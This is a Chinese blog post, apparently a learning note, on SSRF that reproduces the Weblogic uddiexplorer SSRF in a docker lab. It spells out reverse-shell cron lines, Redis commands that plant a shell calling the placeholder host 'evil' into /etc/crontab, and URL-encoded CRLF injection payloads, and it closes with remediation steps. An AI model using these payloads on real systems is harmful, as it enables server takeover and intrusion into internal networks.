SSRF学习 3

最新推荐文章于 2024-01-03 14:34:33 发布
最新推荐文章于 2024-01-03 14:34:33 发布
阅读量492 收藏 1
点赞数
分类专栏: SSRF 漏洞复现 文章标签: 服务器 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/129283686
版权
本文详细介绍了SSRF(Server-SideRequestForgery)的定义,常见发生位置,测试流程,以及通过Weblogic的SSRF漏洞如何复现,包括探测内网、利用Redis反弹shell的过程。同时,文章提供了相应的修复方案,如限制访问和修改应用程序组件。
摘要由CSDN通过智能技术生成

目录

<1> 什么是SSRF?

<2> 通常SSRF会发生在哪些位置?

<3> 测试流程

<4> Weblogic-ssrf 复现

(1) 漏洞存在点

(2) 注入HTTP头,利用Redis反弹shell

 (3) 修复方案

<1> 什么是SSRF?

SSRF(Server-Side Request Forgery)服务器端请求伪造。与 CSRF 不同的是,SSRF 针对的是从外部无法访问的服务器所在的内网,并对其进行探测、攻击。
服务器端请求伪造,简单来说,就是服务器端代替用户向目标网址发起请求,当目标地址为服务器内网时,便造成了 SSRF。

可造成的危害有:

  • 内网主机端口探测(cms识别)

    利用http协议对内网进行探测,探测整个内网的存活ip,和端口,如果要针对redis,那么这一步主要是找开启了6379端口的内网ip地址。

    可利用bp或者脚本进行快速探测,由于回显的不同,脚本就需要按照回显的特征来写,那种回显是存在,哪种回显是不存在这样的ip或端口

  • 任意文件读取
  • 攻击内网、getshell
  • 等等

<2> 通常SSRF会发生在哪些位置?

  • 添加图片地址
  • 添加 url
  • 一些在线服务,如:爬虫、网页分享(获取摘要)等等
  • XXE 漏洞也可以造成 SSRF
  • 远程文件包含也可造成 SSRF
  • 各种 api 接口
    • url 中的关键字有:share、wap、url、link、src、source、target、display、sourceURl、imageURL、domain·······

<3> 测试流程

  • 寻找一些跟添加 url 有关的功能点

  • 发包、抓包,观察 GET 参数或者 POST 参数中的参数有无特征参数,并且参数值为 URL 网址

  • 更改其中的 URL 的值后发包,对比正常请求,观察返回包长度、返回码、返回信息、响应时间以及是否有响应,不同则可能存在SSRF漏洞

  • 也可以将其中的 URL 的值改为自己的远程主机,并在主机上开启监听。当监听到该网址发送过来的请求时,则可能存在SSRF漏洞

  • 尝试绕过过滤规则,实现内网探测、攻击,比如说 redis 未授权访问拿 shell 等

  • 利用 file:// 协议,则可进行任意文件读取,进一步利用拿 shell 等

<4> Weblogic-ssrf 复现

漏洞描述:Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件

影响版本:weblogic 10.0.2 – 10.3.6版本

(1) 漏洞存在点

 docker-compose up -d

访问http://your-ip:7001/console/login/LoginForm.jsp 可以看见登录页面

访问http://your-ip:7001/uddiexplorer/,无需登录即可查看uddiexplorer应用

SSRF漏洞存在于http://your-ip:7001/uddiexplorer/SearchPublicRegistries.jsp

 burp抓包进行测试

  • 修改operator参数为外网http://www.baidu.com

会返回

Received a response from url: http://www.baidu.com which did not have a valid SOAP content-type: text/html

 很明显,服务器是访问了百度,并且告知客户端其接收到了一个包含content-type: text/html的响应

  • 再访问本机存在的端口,修改operator参数为http://127.0.0.1:7001

一般是返回 status code

  • 修改为一个不存在的端口,修改operator参数为http://127.0.0.1:6666

将会返回could not connect over HTTP to server 

  •  当访问内网一些不走 http 协议并且开启了的端口时 比如redis 6379,修改operator参数为http://172.23.0.2:6379 (redis服务器ip为172.23.0.2   weblogic为172.23.0.3)

会返回 did not have a valid SOAP content-type

通过错误的不同,即可探测内网状态

(2) 注入HTTP头,利用Redis反弹shell

        Weblogic的SSRF有一个比较大的特点,其虽然是一个“GET”请求,但是我们可以通过传入%0a%0d来注入换行符,而某些服务(如redis)是通过换行符来分隔每条命令,也就说我们可以通过该SSRF攻击内网中的redis服务器。

  • 首先,通过ssrf探测内网中的redis服务器(docker环境的网段一般是172.*.*.*),docker inspect发现redis服务ip为172.23.0.2

通过回显错误的信息:did not have a valid SOAP content-type,可以发现172.23.0.2:6379可以连通

python反弹shell: 

*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash反弹shell: 

*/1 * * * * bash -i >& /dev/tcp/127.0.0.1/2333 0>&1
  • 发送如下三条redis命令,将反弹shell脚本写入/etc/crontab定时任务:
set 1 "\n\n\n\n0-59 0-23 1-31 1-12 0-6 root bash -c 'sh -i >& /dev/tcp/evil/21 0>&1'\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

 进行url编码:

set%201%20%22%5cn%5cn%5cn%5cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3e%26%20%2fdev%2ftcp%2fevil%2f21%200%3e%261'%5cn%5cn%5cn%5cn%22%0aconfig%20set%20dir%20%2fetc%2f%0aconfig%20set%20dbfilename%20crontab%0asave

替换%0a为%0d%0a

test%0D%0A%0D%0Aset%201%20%22%5cn%5cn%5cn%5cn0-59%200-23%201-31%201-12%200-6%20root%20bash%20-c%20'sh%20-i%20%3e%26%20%2fdev%2ftcp%2fevil%2f21%200%3e%261'%5cn%5cn%5cn%5cn%22%0d%0aconfig%20set%20dir%20%2fetc%2f%0d%0aconfig%20set%20dbfilename%20crontab%0d%0asave%0D%0A%0D%0Aaaa

注意,换行符是“\r\n”,也就是“%0D%0A”。

将url编码后的字符串放在ssrf的域名后面,发送:

最后补充一下,可进行利用的cron有如下几个地方:

  • /etc/crontab 这个是肯定的
  • /etc/cron.d/* 将任意文件写到该目录下,效果和crontab相同,格式也要和/etc/crontab相同。漏洞利用这个目录,可以做到不覆盖任何其他文件的情况进行弹shell。
  • /var/spool/cron/root centos系统下root用户的cron文件
  • /var/spool/cron/crontabs/root debian系统下root用户的cron文件

 (3) 修复方案

  • 方法一:

删除uddiexplorer文件夹

限制uddiexplorer应用只能内网访问

  • 方法二:

将SearchPublicRegistries.jsp直接删除

  • 方法三:

Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的SearchPublicRegistries.jsp。方法三采用的是改后辍的方式,修复步骤如下:

    1)将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份;

    2)将weblogic安装目录下的server/lib/uddiexplorer.war下载;

    3)用winrar等工具打开uddiexplorer.war;

    4)将其下的SearchPublicRegistries.jsp重命名为SearchPublicRegistries.jspx;

    5)保存后上传回服务端替换原先的uddiexplorer.war;

    6)对于多台主机组成的集群,针对每台主机都要做这样的操作;

    7)由于每个server的tmp目录下都有缓存所以修改后要彻底重启weblogic。

葫芦娃42
关注
专栏目录
weblogic uddiexplorer漏洞解决方法
anhuixiaozi的专栏
04-12 2万+
weblogic uddiexplorer漏洞
SSRF学习(8)URL Bypass
m0_64417923的博客
05-19 456
什么是Bypass? 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面了。 Bypas顾名思义,就是旁路功能,也就是说可以通过特定的触发状态(断电或死机)让两个网络不通过网络安全设备的系
【渗透测试】Weblogic系列漏洞
weixin_53972936的博客
11-01 3577
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
Weblogic SSRF与任意文件读取漏洞
m0_67284865的博客
07-05 400
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。weblogic某些版本还存在任意文件读取。
记一次weblogic-10.3.6.0靶场漏洞利用
屿的博客
09-15 7581
输入 find ./ -name oracle_logo.gif(文件名)进入Vuln-Range的weblogic-10.3.6.0靶场。(去掉. 去掉图片文件名再自己起一个新的文件名 xx.jsp)进入最开始的/uddiexplorer/下的自命名木马.jsp。删掉端口后面多余字符,输入/uddiexplorer/打印出的工作目录和刚刚保存的gif文件路径拼接在一起。在weblogic工具里使用pwd打印工作目录。连接复制到weblogic的shell上传。找到的路径用记事本保存一下。
weblogic下的UDDI及对UDDI的理解
龙行天下
03-09 5869
1.weblogic与UDDI WebLogic Server 包括的 UDDI 目录称为“UDDI 目录浏览器”。可以使用下列 URL 访问 UDDI 目录浏览器:http://localhost:7001/uddiexplorer/index.jspWebLogic Server 配置了可将 Web Service 发布到其中的专用注册表。要发布 Web Service,请执行以下步骤:(1)
SSRF学习记录
web1的博客
09-01 262
什么是SSRF? SSRF全称是Server-Side Request Forgery,它就是攻击者诱使服务器向攻击者指定的域发送HTTP请求,可以用来建立恶意的连接 危害 1、针对服务器本身的SSRF攻击 1.1将stockApi参数中的 URL 更改为 http://localhost/admin 这应该显示管理界面。 <a href="/admin/delete?username=carlos">Delete</a> 1.2阅读 HTML ,确定删除目标用户的 URL,即
SSRF漏洞学习
qi_SJQ_的博客
01-02 967
1.原理及成因 ssrf:服务端请求伪造,这个漏洞危害其实挺大的,外网直接打到内网,利用一台服务器上的web服务进而访问内网其他资产信息。 SSRF 形成的原因:大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 简而言之就是无法外网直接访问内网的其他主机,就能这个存在ssrf的主机当跳板来实现访问内网。 2.危险函数 主要是curl()函数,不过别的类似可以利用协议引入的函数也可以,比如file_get_.
SSRF学习(6)FastCGI协议
m0_64417923的博客
05-16 202
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 FastCGI原理: Wikipedia对FastCGI的解释:快速通用网关接口(FastCommon Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网关接口(CGI)的增强版本。FastCGI致力于减少网页服务器与CGI程序之间交互的开销,从而使服务器可以同时处理更多的网页请求。 php-fpm 官方对php-fpm的解释是FPM(FastCG..
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1193
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
Weblogic的SSRF漏洞
haha1314的博客
08-10 975
Weblogic中存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 漏洞产生于/uddiexplorer/SearchPublicRegistries.jsp页面中,可以导致ssrf,用来攻击内网中一些redis和fastcgi之类的脆弱组件 /uddiexplorer/SearchPublicRegistries.jsp?rdoSea...
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6537
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件,读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
Weblogic SSRF漏洞
热门推荐
chaojixiaojingang
01-14 1万+
1.漏洞描述 weblogic中存在SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSear...
weblogic学习视频
p3348577008的博客
12-16 1488
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一
oracle weblogic uddi,Web中间件漏洞之WebLogic篇
weixin_31682031的博客
04-14 570
方法一:以修复的直接方法是将SearchPublicRegistries.jsp直接删除就好了;方法二:1)删除uddiexplorer文件夹2)限制uddiexplorer应用只能内网访问方法三:(常用)Weblogic服务端请求伪造漏洞出现在uddi组件(所以安装Weblogic时如果没有选择uddi组件那么就不会有该漏洞),更准确地说是uudi包实现包uddiexplorer.war下的Se...
Weblogic SSRF漏洞复现
bring_coco的博客
03-24 362
漏洞介绍 漏洞描述 Weblogic的http://yourip:7001/uddiexplorer/SearchPublicRegistries.jsp中由于服务器端没有对用户请求做出严格的过滤及限制,导致其可以从其他服务器获取一定的信息存在SSRF漏洞,利用该漏洞可以发送任意的HTTP请求,进而探测内网的redis,fastcgi等脆弱组件 影响版本 10.0.2.0 10.3.6.0 漏洞利用 环境:vulhub(ip:192.168.188.130) 1.开启该环境后访问http://your-i
weblogic CVE-2014-4210 SSRF漏洞
ChenD的学习笔记
05-22 1777
然后直接VPS拉取vulhub的镜像出现连接不到反弹shell的问题(但是成功写入了,其实也算完成实验了),最后本地搞出来啦,结果没有ssh,猛男哭泣!redis可能存在授权访问漏洞,同时redis默认是不对外开放的,意思就是说只有内网可以访问redis服务器,外网访问不到,这时候就体现出了SSRF请求伪造漏洞的作用。然后kali也出问题了,docker拉取的vulhub拉取的weblogic/ssrf 镜像,启动后只启动了weblogic,redis起不来,很怪异。
weblogic文件上传路径
tomyyyyy
05-23 813
weblogic文件上传路径 将shell写到uddiexplorer目录 uddiexplorer目录上传shell /u01/domains/osb/servers/AdminServer/tmp/_WL_internal/uddiexplorer/随机字符/war/666.jsp shell 访问 http://xxxx/uddiexplorer/shell.jsp 将shell写到ima...
Web常见漏洞描述及修复建议
最新发布
Galaxy_0的博客
01-03 1753
Web程序中对于用户提交的参数做过滤直接拼接到SQL语句中执行,导致参数中的特殊字符破坏了SQL语句原有逻辑,攻击者可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。代码层最佳防御sql漏洞方案:使用预编译sql语句查询和绑定变量。(1)使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。
学习ssrf相关的知识体系
04-27
3. 掌握SSRF的检测和修复方法:要有效地防御SSRF攻击,需要掌握SSRF的检测和修复方法。这包括对应用程序的漏洞扫描、安全配置和代码审计等方面的掌握。 4. 学习SSRF相关的工具和框架:有很多工具和框架可以帮助你...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值